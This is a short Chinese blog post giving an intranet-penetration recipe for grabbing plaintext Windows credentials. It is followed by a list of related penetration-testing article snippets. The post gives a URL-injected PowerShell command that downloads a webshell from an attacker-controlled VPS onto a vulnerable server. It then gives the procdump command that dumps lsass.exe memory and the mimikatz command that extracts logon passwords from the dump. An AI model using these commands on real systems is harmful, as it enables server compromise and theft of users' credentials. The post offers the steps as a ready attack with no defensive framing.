内网渗透之简单明文抓取

最新推荐文章于 2024-05-08 20:36:36 发布
最新推荐文章于 2024-05-08 20:36:36 发布
阅读量508 收藏
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/108162069
版权

前提:

存在命令执行的windows服务器

利用:

1,将一句话木马上传到自己的vps上,通过命令执行漏洞,执行命令将一句话木马下载到服务器当中(需要知道绝对路径)

http://url?pwd=zs&cmd=cmd+/c+powershell+(new-object System.Net.WebClient).DownloadFile('http://vps/shell.txt','C:/绝对路径/shy.jsp')

2,使用菜刀进行连接,上传procdump64.exe抓取lsass.exe进程

./procdump64.exe -accepteula -ma lsass.exe lsass.dmp

3,将抓取到的lsass.dmp拷贝到本地,在本地使用mimikatz抓取明文

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

看只要密码强度够,就抓不到明文,就不上图了。

 

 

 

 

shy014
关注
专栏目录
内网渗透-Windows内网渗透
lza20001103的博客
08-15 2002
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-14 869
ProcDump 还包括使用窗口挂起 (使用相同的窗口挂起定义,Windows任务管理器使用) 、未经处理的异常监视,并且可以根据系统性能计数器的值生成转储。3、使用PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。从lsass进程中提取passwords、keys、pin、tickets等信息。2、使用procdump 导出lsass.dmp文件。5、读取lsass.dmp文件。
Burp Suite抓取明文
最新发布
banliyaoguai的博客
05-08 503
如果按照上面的步骤进行配置后,那么burp suite只可以抓取http的数据,想要抓取https的数据,需要安装证书。但是burp suite不是合法的数字证书认证机构,想要抓取https的数据,需要伪造公钥证书,获取客户端的信任。用来验证客户端得到的证书是合法的。将代理设置到自己本机,然后客户端在向服务端发起请求的时候会经过代理,然后你可以在代理上面对发送的请求进行修改,同理在服务端回应客户端请求的时候,代理也可以拦截,然后进行对回复的数据进行修改。或者在浏览器的设置中搜索证书,浏览器中进行安装。
APP渗透测试之代理篇
10-17
本课程就APP渗透测试中的服务端测试进行讲解,课程中讲解如何使用夜神模拟器,如何抓取app中的http协议流量及HTTPS协议流量。结合web服务端测试,通过抓取的流量进行修改来完成服务端渗透测试。
内网渗透常用提权方式总结
j1044957016的博客
06-01 7783
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
内网渗透 -- 捕获内网数据包
weixin_41489908的博客
07-02 1141
偶尔适度的放纵一下,是为了继续道貌岸然的生活,太急了会没有故事,太缓了会没有人生。。。。 ---- 网易云热评 环境:小攻:Kali 2020,ip:192.168.1.133 小受:win7 x86,ip:192.168.1.137 一、生成木马及监听主机参考上篇文章: 二、捕获数据包 1、加载sniffer:loadsniffer 2、查看网卡信息:sniffer_interfaces 3、开启网卡监听,内容会自动保存到缓存中:sniffer_st...
(一)内网渗透之信息收集
爱上卿的博客
08-27 1673
内网渗透之信息收集篇-----参考先知白河愁作品,进行添加修改,转载请注明出处。 一 主机扫描 (1)使用端口扫描工具可以实现主机发现的功能。以下参数可加快扫描进程。特意提的事nmap如何加快扫描进度。 –min-hostgroup 1024(调整并行扫描组的大小,最小分组设置为1024) –min-parallelism 1024(调整探测报文的并行度,最小并行度设置为1024)   ...
内网渗透(抓取明文密码)
qq_42383069的博客
12-26 1303
内网渗透--抓取密码
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2830
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
内网渗透之信息收集
世间繁华梦一出
03-13 1570
内网渗透之信息收集一、内网信息收集概述二、收集本机信息 信息收集的深度,直接关系到内网渗透测试的成败 一、内网信息收集概述 1.1、我是谁? ——对当前机器角色的判断 WEB服务器?开发测试服务器?公共服务器?文件服务器?代理服务器?DNS服务器?等等?? 根据 主机名、文件、网络连接情况综合判断。 1.2、这是哪? —— 对当前机器所处网络环境的拓扑结构进行分析与判断。 绘制大致内网拓扑图 1.3、我在哪 ——- 对当前机器所处区域的判断。 DMZ区、办公区、核心区 二、收集本机信息 2.1手动信息收集
关于《Python绝技:运用Python成为顶级黑客》的学习笔记
u014538198的专栏
06-22 1万+
这里将会把《Python绝技:运用Python成为顶级黑客》中的代码敲一遍,然后根据具体的情况修改一下代码,时间足够的话就会继续敲代码更新一下,期间肯定会有很多问题需要懂得的大牛指导一下~ 为了巩固一下基础,就从头到尾地敲一遍吧~ 第一章——入门 1、准备开发环境 安装第三方库: 安装Python-nmap包: wget http://xael.or
【横向移动】内网渗透之内网信息收集
weixin_45588247的博客
08-01 2233
首先要能拿下一台可连接内的机器权限(webshell),然后才能开始域渗透收集系统一般信息,包括操作系统、IP、是否存在杀毒软件、打过的补丁,用户信息,服务及任务信息,组网信息,计划任务信息,事件查看器信息和文件夹和文件位置信息。 对机器角色的判断。对目前机器所处网络环境的拓扑结构进行分析和判断。对目前机器所处位置区域的判断
mimikatz抓取明文密码(Windows Server 2008 R2 x64)
CC's Blog
03-12 9231
使用方法如下: 1.privilege::debug 2.inject::process lsass.exe F:\tools\x64\sekurlsa.dll 3.@getLogonPasswords 有图有真相:
国内五大主流网站内容抓取工具/采集软件大盘点
Enweitech Software Works
12-12 3万+
大数据技术用了多年时间进行演化,才从一种看起来很炫酷的新技术变成了企业在生产经营中实际部署的服务。其中,数据采集产品迎来了广阔的市场前景,无论国内外,市面上都出现了许多技术不一、良莠不齐的采集软件。 今天,我们将对比国内五大主流采集软件优缺点,帮助你选择最适合的爬虫,体验数据hunting带来的快感。 国内篇 1.火车头 作为采集界的老前辈,我们火车头是一款互联网数据抓取、处理、分析,...
Fiddler抓取数据并分析(完整的配置教程)
热门推荐
GitHubClub
05-03 7万+
一、Fiddler现在的移动应用程序几乎都会和网络打交道,所以在分析一个 app 的时候,如果可以抓取出其发出的数据包,将对分析程序的流程和逻辑有极大的帮助。对于HTTP包来说,已经有很多种分析的方法了,但是现在越来越多的应用已经使用HTTPS协议来和服务器端交换数据了,这无疑给抓包分析增加了难度。可是 Windows系统下的 Fiddler 可以用来解决这个问题。Fiddler 的下载地址就不贴了
渗透测试之Windows提取常用命令
qq_45226339的博客
04-21 250
Windows提权常见命令: Whoami 查看当前操作用户 ipconfig ip地址获取命令 Net user用户操作命令: Net user shiyan 123456 /add 添加用户名shiyan,密码123456的用户 Net user shiyan /del 删除用户shiyan Net localgroup administrators shiyan /add 将用户shiyan...
APP渗透测试之IOS突破SSLPinning技术抓取HTTPS数据包
Delity的博客
01-26 3721
一、环境 手机型号:iPhone7 IOS版本:13.6.1 二、越狱 1.利用某思助手的一件越狱功能 等待电脑端跑完 2.然后手机上多了unc0ver,打开它然后点击Re-Jailbreak 一键越狱,期间会弹出信息提示,直接点击OK就可以了 注:需要在设置里面信任该软件 3.到出现界面(进度为 20/30)时,选择“OK”,此时设备会自动重启,重启后再点 jailbreak,直到出现越狱完成,再次点击 OK 即可 注:在越狱过程中,unc0ver 应用界面可能会出现以下广告,点击上方的“x”进行关
渗透之Aircrack—wifi破解
OKAY_TC的博客
04-02 7220
环境:kali 工具使用:无线网卡(型号雷凌RT3070L) //注意型号选择的使用,不同型号可能导致kali无法识别。 步骤总结: 1. kali连接外接无线网卡。 2. ifconfig查看网卡信息(新出现的wlan0网卡) 3. 开启网卡监听模式:airmon-ng start wlan0 4. wifi扫描:airodump-ng wlan0mon 5. 连接客户端:airo...
一句话木马上传常见的几种方法
YidaHu的博客
01-06 3万+
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.
黑客内网渗透技术解析
"内网渗透常用手法" 内网渗透是黑客攻击的一种策略,通常发生在攻击者已经突破了外层防御并进入内部网络之后。在安全措施日益增强的今天,外网渗透变得越来越困难,因此内网渗透成为黑客寻找敏感信息和控制目标系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值